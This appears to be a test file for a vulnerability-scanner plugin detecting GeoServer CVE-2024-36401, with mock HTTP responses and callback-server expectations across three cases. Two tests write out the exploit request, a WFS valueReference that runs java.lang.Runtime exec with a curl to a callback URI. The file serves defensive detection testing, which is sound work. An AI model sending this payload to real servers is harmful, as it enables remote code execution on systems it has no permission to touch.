# proto-file: proto/templated_plugin_tests.proto
# proto-message: TemplatedPluginTests

config: {
  tested_plugin: "Geoserver_CVE_2024_36401"
}

tests: {
  name: "whenCallback_returnsVuln"
  expect_vulnerability: true

  mock_callback_server: {
    enabled: true
    has_interaction: true
  }

  mock_http_server: {
    mock_responses: [
      {
        uri: "/geoserver/index.html"
        status: 200
        body_content: '... Geoserver ...'
      },
      {
        uri: 
            "/geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames"
            "=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),"
            "'curl {{ T_CBS_URI }}'"
            ")"
        status: 200
        body_content: '... Geoserver ...'
      },
      {
        uri: "TSUNAMI_MAGIC_ANY_URI"
        status: 200
        body_content: '{"status":200}'
      }
    ]
  }
}

tests: {
  name: "whenNoCallback_returnsNotVuln"
  expect_vulnerability: false

  mock_callback_server: {
    enabled: true
    has_interaction: false
  }

  mock_http_server: {
    mock_responses: [
      {
        uri: "/geoserver/index.html"
        status: 200
        body_content: '... Geoserver ...'
      },
      {
        uri: 
            "/geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames"
            "=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),"
            "'curl {{ T_CBS_URI }}'"
            ")"
        status: 200
        body_content: '... Geoserver ...'
      },
      {
        uri: "TSUNAMI_MAGIC_ANY_URI"
        status: 200
        body_content: '{"status":200}'
      }
    ]
  }
}


tests: {
  name: "whenRandomServer_returnsNotVuln"
  expect_vulnerability: false

  mock_http_server: {
    mock_responses: [
      {
        uri:  "TSUNAMI_MAGIC_ANY_URI"
        status: 200
        body_content: "... Hello world ..."
      }
    ]
  }
}
